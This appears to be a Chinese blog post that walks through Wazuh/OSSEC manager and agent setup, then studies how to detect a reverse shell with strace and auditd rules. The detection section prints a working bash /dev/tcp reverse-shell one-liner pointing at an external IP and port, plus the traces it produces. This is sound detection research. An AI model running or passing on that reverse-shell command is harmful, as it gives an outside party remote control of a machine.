访问界面
点击”Wazuh”按钮
点击”ADD NEW API”

Welcome to the Wazuh App for Kibana 5
The Wazuh App brings together a new and useful web interface for managing and monitoring your Wazuh infrastructure. You can check agent status, alert evolution, most recent events, popular alerts, top alert groups, etc. You can also display configuration and logs of the manager.

In addition, make use of any or all of these extensions:

Linux Audit system integration.
PCI DSS Compliance.
OpenSCAP security compliance and vulnerability assessments.
The app joins Wazuh features like: Log management and analysis, file integrity monitoring, intrusion and anomaly detection and policy and compliance monitoring.

Help us to improve this app. We would appreciate your feedback. Collaborate with us on the Mailing Lists and/or the Wazuh App Github repository


Please enter your Wazuh RESTful API credentials at the form below to begin.

请看上面的介绍，Wazuh主要的功能特性和扩展。新版本在上方的导航将api、扩展、关于分3个页面。

添加api之前准备工作

在填用户名、密码、url、端口之前，要先到Wazuh server主机上，使用命令生成非默认的认证来保护Wazuh API。

[root@localhost ~]# cd /var/ossec/api/configuration/auth/
[root@localhost auth]# ls
htpasswd  user
[root@localhost auth]# sudo node htpasswd -c user wazuh-api
New password: 
Re-type new password: 
Adding password for user wazuh-api.
[root@localhost auth]# ll
总用量 4
lrwxrwxrwx. 1 root root 49 8月   1 15:12 htpasswd -> /var/ossec/api/node_modules/htpasswd/bin/htpasswd
-rwxr-x---. 1 root root 48 8月  23 17:47 user
[root@localhost auth]# service wazuh-api restart
WAZUH-API stopped.
WAZUH-API started.

可以先访问一下web，看认证是否成功

填入api字段-提示错误

官方的邮件列表解释了这个bug：
https://groups.google.com/forum/#!msg/wazuh/kBVoD-X7xX4/vpDOHjKhCQAJ

解决v2.0的bug

1 2	yum upgrade wazuh-manager yum upgrade wazuh-api

官方列表里的讨论在版本比对时逻辑有错误等，在新版本中修复，升级就可以了。

安装agent

这个就很简单了：
https://documentation.wazuh.com/current/installation-guide/installing-wazuh-agent/index.html

注册agent

Manager的server端

ssl认证

[root@localhost db]# openssl req -x509 -batch -nodes -days 365 -newkey rsa:2048 -keyout /var/ossec/etc/sslmanager.key -out /var/ossec/etc/sslmanager.cert
Generating a 2048 bit RSA private key
...............................+++
.........+++
writing new private key to '/var/ossec/etc/sslmanager.key'
-----

开启ossec-authd服务

[root@localhost db]# /var/ossec/bin/
agent_control       ossec-analysisd     ossec-execd         ossec-luac          ossec-remoted       syscheck_update     
clear_stats         ossec-authd         ossec-integratord   ossec-maild         ossec-reportd       update_ruleset.py   
list_agents         ossec-control       ossec-logcollector  ossec-makelists     ossec-syscheckd     util.sh             
manage_agents       ossec-csyslogd      ossec-logtest       ossec-monitord      rootcheck_control   verify-agent-conf   
ossec-agentlessd    ossec-dbd           ossec-lua           ossec-regex         syscheck_control    wazuh-modulesd      
[root@localhost db]# /var/ossec/bin/ossec-authd
[root@localhost db]#

agent-auth客户端

客户端注册服务端ip

[root@localhost ~]# /var/ossec/bin/agent-auth -m 192.168.106.42
2017/08/28 14:54:58 agent-auth: INFO: Started (pid: 6235).
WARN: No authentication password provided.
INFO: Connected to 192.168.106.42:1515
INFO: Using agent name as: localhost.localdomain
INFO: Send request to manager. Waiting for reply.
INFO: Received response with agent key
INFO: Valid key created. Finished.
INFO: Connection closed.

查看是否成功

server 端

1
2
3

[root@localhost db]# cat /var/ossec/etc/client.keys
001 localhost.localdomain any 5e7168616c858ef0d9a8c1737359825e72c17bf3a9575ed9f696e4b30masaike
[root@localhost db]# /var/ossec/bin/agent_control -l

agent 端

1 2	[root@localhost ~]# cat /var/ossec/etc/client.keys 001 localhost.localdomain any 5e7168616c858ef0d9a8c1737359825e72c17bf3a9575ed9f696e4b30masaike

连接到服务端Manager

/var/ossec/etc/ossec.conf

把

  
    MANAGER_IP
    centos, centos6
    udp
  
改成

  
    192.168.106.42
    centos, centos6
    udp

启动（重启）wazuh-agent

1
2
3

[root@localhost ~]# service wazuh-agent start
Starting OSSEC: 2017/08/28 15:19:09 ossec-agentd: INFO: Using notify time: 600 and max time to reconnect: 1800
                                                           [  OK  ]

但是你会看到wazuh面板agents管理上，显示的连接过来的机器ip写的是any。因为
/var/ossec/bin/ossec-authd默认启动后，将注册any为连接ip，在服务端kill掉ossec-authd进程，然后
/var/ossec/bin/ossec-authd -i启动。在server端通过
/var/ossec/bin/manage_agents，删除已经注册的agent；在agent端删除
/var/ossec/etc/client.keys里的内容记录，重新
/var/ossec/bin/agent-auth -m 192.168.106.42注册，重启agent。

反弹shell监控

2017-07-25T08:28:06.000Z

一、跟踪系统调用

1. strace bash test.sh

root@Kali:~/pirogue/reverse_shell# strace bash test.sh 
execve("/bin/bash", ["bash", "test.sh"], [/* 50 vars */]) = 0
brk(NULL)                               = 0x7a2000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb87000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=128554, ...}) = 0
mmap(NULL, 128554, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb67000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libtinfo.so.5", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\315\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=170776, ...}) = 0
mmap(NULL, 2267936, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd73d000
mprotect(0x7fcafd762000, 2097152, PROT_NONE) = 0
mmap(0x7fcafd962000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7fcafd962000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200\r\0\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0644, st_size=14640, ...}) = 0
mmap(NULL, 2109680, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd539000
mprotect(0x7fcafd53c000, 2093056, PROT_NONE) = 0
mmap(0x7fcafd73b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2000) = 0x7fcafd73b000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\3\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fcafd19a000
mprotect(0x7fcafd32f000, 2097152, PROT_NONE) = 0
mmap(0x7fcafd52f000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7fcafd52f000
mmap(0x7fcafd535000, 14752, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fcafd535000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fcafdb65000
arch_prctl(ARCH_SET_FS, 0x7fcafdb65b40) = 0
mprotect(0x7fcafd52f000, 16384, PROT_READ) = 0
mprotect(0x7fcafd73b000, 4096, PROT_READ) = 0
mprotect(0x7fcafd962000, 16384, PROT_READ) = 0
mprotect(0x700000, 12288, PROT_READ)    = 0
mprotect(0x7fcafdb8a000, 4096, PROT_READ) = 0
munmap(0x7fcafdb67000, 128554)          = 0
open("/dev/tty", O_RDWR|O_NONBLOCK)     = 3
close(3)                                = 0
brk(NULL)                               = 0x7a2000
brk(0x7a3000)                           = 0x7a3000
open("/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
brk(0x7a4000)                           = 0x7a4000
open("/usr/share/locale/locale.alias", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2995, ...}) = 0
brk(0x7a6000)                           = 0x7a6000
read(3, "# Locale name alias data base.\n#"..., 4096) = 2995
brk(0x7a7000)                           = 0x7a7000
brk(0x7a8000)                           = 0x7a8000
read(3, "", 4096)                       = 0
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_IDENTIFICATION", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=368, ...}) = 0
mmap(NULL, 368, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb86000
close(3)                                = 0
open("/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=26258, ...}) = 0
mmap(NULL, 26258, PROT_READ, MAP_SHARED, 3, 0) = 0x7fcafdb7f000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MEASUREMENT", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=23, ...}) = 0
mmap(NULL, 23, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7e000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_TELEPHONE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0
mmap(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7d000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_ADDRESS", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=167, ...}) = 0
mmap(NULL, 167, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7c000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_NAME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_NAME", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=77, ...}) = 0
mmap(NULL, 77, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7b000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_PAPER", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_PAPER", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=34, ...}) = 0
mmap(NULL, 34, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb7a000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
close(3)                                = 0
open("/usr/lib/locale/en_US.utf8/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0
mmap(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb79000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_MONETARY", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=286, ...}) = 0
mmap(NULL, 286, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb78000
close(3)                                = 0
brk(0x7a9000)                           = 0x7a9000
open("/usr/lib/locale/en_US.UTF-8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_COLLATE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=1244054, ...}) = 0
mmap(NULL, 1244054, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafda35000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_TIME", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_TIME", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2454, ...}) = 0
mmap(NULL, 2454, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb77000
close(3)                                = 0
brk(0x7aa000)                           = 0x7aa000
open("/usr/lib/locale/en_US.UTF-8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_NUMERIC", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=54, ...}) = 0
mmap(NULL, 54, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafdb76000
close(3)                                = 0
open("/usr/lib/locale/en_US.UTF-8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/usr/lib/locale/en_US.utf8/LC_CTYPE", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=328180, ...}) = 0
mmap(NULL, 328180, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fcafd9e4000
close(3)                                = 0
brk(0x7ab000)                           = 0x7ab000
getuid()                                = 0
getgid()                                = 0
geteuid()                               = 0
getegid()                               = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
ioctl(-1, TIOCGPGRP, 0x7ffeed7229ac)    = -1 EBADF (Bad file descriptor)
sysinfo({uptime=195741, loads=[21312, 14080, 6432], totalram=4148080640, freeram=202342400, sharedram=510382080, bufferram=24547328, totalswap=2145382400, freeswap=1889628160, procs=584, totalhigh=0, freehigh=0, mem_unit=1}) = 0
brk(0x7ac000)                           = 0x7ac000
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGCHLD, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTSTP, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTTIN, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGTTOU, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
uname({sysname="Linux", nodename="Kali", ...}) = 0
brk(0x7b0000)                           = 0x7b0000
brk(0x7b2000)                           = 0x7b2000
brk(0x7b4000)                           = 0x7b4000
brk(0x7b5000)                           = 0x7b5000
brk(0x7b6000)                           = 0x7b6000
brk(0x7b7000)                           = 0x7b7000
brk(0x7b8000)                           = 0x7b8000
stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue/reverse_shell", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/root/pirogue", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getpid()                                = 4833
brk(0x7b9000)                           = 0x7b9000
getppid()                               = 4831
stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
stat("/usr/local/sbin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/bash", 0x7ffeed722620) = -1 ENOENT (No such file or directory)
stat("/usr/sbin/bash", 0x7ffeed722620)  = -1 ENOENT (No such file or directory)
stat("/usr/bin/bash", 0x7ffeed722620)   = -1 ENOENT (No such file or directory)
stat("/sbin/bash", 0x7ffeed722620)      = -1 ENOENT (No such file or directory)
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid()                               = 0
getegid()                               = 0
getuid()                                = 0
getgid()                                = 0
access("/bin/bash", X_OK)               = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid()                               = 0
getegid()                               = 0
getuid()                                = 0
getgid()                                = 0
access("/bin/bash", R_OK)               = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid()                               = 0
getegid()                               = 0
getuid()                                = 0
getgid()                                = 0
access("/bin/bash", X_OK)               = 0
stat("/bin/bash", {st_mode=S_IFREG|0755, st_size=1099016, ...}) = 0
geteuid()                               = 0
getegid()                               = 0
getuid()                                = 0
getgid()                                = 0
access("/bin/bash", R_OK)               = 0
getpid()                                = 4833
brk(0x7ba000)                           = 0x7ba000
brk(0x7bb000)                           = 0x7bb000
getpgrp()                               = 4831
ioctl(2, TIOCGPGRP, [4831])             = 0
rt_sigaction(SIGCHLD, {sa_handler=0x44cf90, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER|SA_RESTART, sa_restorer=0x7fcafd1cd030}, 8) = 0
getrlimit(RLIMIT_NPROC, {rlim_cur=15710, rlim_max=15710}) = 0
brk(0x7bc000)                           = 0x7bc000
brk(0x7bd000)                           = 0x7bd000
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)  = 0
brk(0x7be000)                           = 0x7be000
open("test.sh", O_RDONLY)               = 3
stat("test.sh", {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
ioctl(3, TCGETS, 0x7ffeed722940)        = -1 ENOTTY (Inappropriate ioctl for device)
lseek(3, 0, SEEK_CUR)                   = 0
read(3, "exec 9<> /dev/tcp/130.182.116.111"..., 80) = 73
lseek(3, 0, SEEK_SET)                   = 0
getrlimit(RLIMIT_NOFILE, {rlim_cur=1024, rlim_max=4*1024}) = 0
fcntl(255, F_GETFD)                     = -1 EBADF (Bad file descriptor)
dup2(3, 255)                            = 255
close(3)                                = 0
fcntl(255, F_SETFD, FD_CLOEXEC)         = 0
fcntl(255, F_GETFL)                     = 0x8000 (flags O_RDONLY|O_LARGEFILE)
fstat(255, {st_mode=S_IFREG|0644, st_size=73, ...}) = 0
lseek(255, 0, SEEK_CUR)                 = 0
brk(0x7bf000)                           = 0x7bf000
read(255, "exec 9<> /dev/tcp/130.182.116.111"..., 73) = 73
brk(0x7c0000)                           = 0x7c0000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(2323), sin_addr=inet_addr("130.182.116.111")}, 16) = 0
fcntl(9, F_GETFD)                       = -1 EBADF (Bad file descriptor)
dup2(3, 9)                              = 9
close(3)                                = 0
fcntl(0, F_GETFD)                       = 0
fcntl(0, F_DUPFD, 10)                   = 10
fcntl(0, F_GETFD)                       = 0
fcntl(10, F_SETFD, FD_CLOEXEC)          = 0
dup2(9, 0)                              = 0
fcntl(9, F_GETFD)                       = 0
close(10)                               = 0
fcntl(1, F_GETFD)                       = 0
fcntl(1, F_DUPFD, 10)                   = 10
fcntl(1, F_GETFD)                       = 0
fcntl(10, F_SETFD, FD_CLOEXEC)          = 0
dup2(9, 1)                              = 1
fcntl(9, F_GETFD)                       = 0
fcntl(2, F_GETFD)                       = 0
fcntl(2, F_DUPFD, 10)                   = 11
fcntl(2, F_GETFD)                       = 0
fcntl(11, F_SETFD, FD_CLOEXEC)          = 0
dup2(1, 2)                              = 2
fcntl(1, F_GETFD)                       = 0
close(11)                               = 0
close(10)                               = 0
brk(0x7c1000)                           = 0x7c1000
rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7fcafdb65e10) = 4834
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGINT, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], 0, NULL) = 4834
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, {sa_handler=0x449930, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fcafd1cd030}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=4834, si_uid=0, si_status=127, si_utime=0, si_stime=0} ---
wait4(-1, 0x7ffeed722010, WNOHANG, NULL) = -1 ECHILD (No child processes)
rt_sigreturn({mask=[]})                 = 0
read(255, "", 73)                       = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
exit_group(127)                         = ?
+++ exited with 127 +++

2. strace -c bash test.sh

二、audit监控分析

1. audit相关资料

A Brief Introduction to auditd
http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/
Finding short-lived TCP connections owner process
https://serverfault.com/questions/352259/finding-short-lived-tcp-connections-owner-process
Linux auditd
http://wiki.nokernel.net/linux-auditd
⁠Understanding Audit Log Files
https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Security_Guide/sec-Understanding_Audit_Log_Files.html
ubuntu - auditctl - a utility to assist controlling the kernel’s audit system
http://manpages.ubuntu.com/manpages/zesty/en/man8/auditctl.8.html
finding-short-lived-tcp-connections-owner-process
https://serverfault.com/questions/352259/finding-short-lived-tcp-connections-owner-process

2. 测试audit监控规则

1
2
3

auditctl -A exit,always -S connect
auditctl -a exit,always -F arch=b64 -F a0=2 -F a1=1 -S socket -k CONNECTION
auditctl -a exit,always -F arch=b64 -S connect

1) auditctl -a exit,always -F arch=b64 -S connect

1 2	root@Kali:~/pirogue/reverse_shell# auditctl -l -a always,exit -F arch=b64 -S connect

回显：

1
2
3

tailf /var/log/audit/audit.log

type=CONFIG_CHANGE msg=audit(1500974819.373:24): auid=0 ses=3 op="add_rule" key=(null) list=4 res=1

bash test.sh

回显：

tailf /var/log/audit/audit.log

type=SYSCALL msg=audit(1500975246.989:30): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=1c052b8 a2=10 a3=129 items=0 ppid=4722 pid=7736 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
type=SOCKADDR msg=audit(1500975246.989:30): saddr=0200091385827E520000000000000000
type=PROCTITLE msg=audit(1500975246.989:30): proctitle=6261736800746573742E7368

exec 9<> /dev/tcp/130.182.116.111/2323;exec 0<&9;exec 1>&9 2>&1;/bin/bash

直接执行反弹命令，并没有audit到网络连接行为。但反弹shell中执行：whoami，出现回显。

type=SYSCALL msg=audit(1500975460.957:49): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798490 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=SOCKADDR msg=audit(1500975460.957:49): saddr=01002F7661722F72756E2F6E7363642F736F636B657400000000000000000000E029ECE3CD550000002CECE3CD55000000000000000000004B389E12077F00008028ECE3CD55000080988C12077F00001C000000000000004073C312077F0000F386799CFE7F0000100000000000
type=CWD msg=audit(1500975460.957:49): cwd="/root"
type=PATH msg=audit(1500975460.957:49): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
type=PROCTITLE msg=audit(1500975460.957:49): proctitle="whoami"
type=SYSCALL msg=audit(1500975460.961:50): arch=c000003e syscall=42 success=no exit=-2 a0=3 a1=7ffe9c798640 a2=6e a3=6 items=1 ppid=7771 pid=7775 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="whoami" exe="/usr/bin/whoami" key=(null)
type=SOCKADDR msg=audit(1500975460.961:50): saddr=01002F7661722F72756E2F6E7363642F736F636B65740000109AE512077F000001000000000000000000000000000000C887799CFE7F0000D120C412077F00000100000000000000109AE512077F0000010000000000000000000000000000000100000000000000000000000000
type=CWD msg=audit(1500975460.961:50): cwd="/root"
type=PATH msg=audit(1500975460.961:50): item=0 name="/var/run/nscd/socket" nametype=UNKNOWN
type=PROCTITLE msg=audit(1500975460.961:50): proctitle="whoami"

2) auditctl -a always,exit -F arch=b64 -S socket

1
2

type=SYSCALL msg=audit(1500976257.753:113): arch=c000003e syscall=41 success=yes exit=3 a0=2 a1=1 a2=6 a3=2b items=0 ppid=2409 pid=7894 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=3 comm="bash" exe="/bin/bash" key=(null)
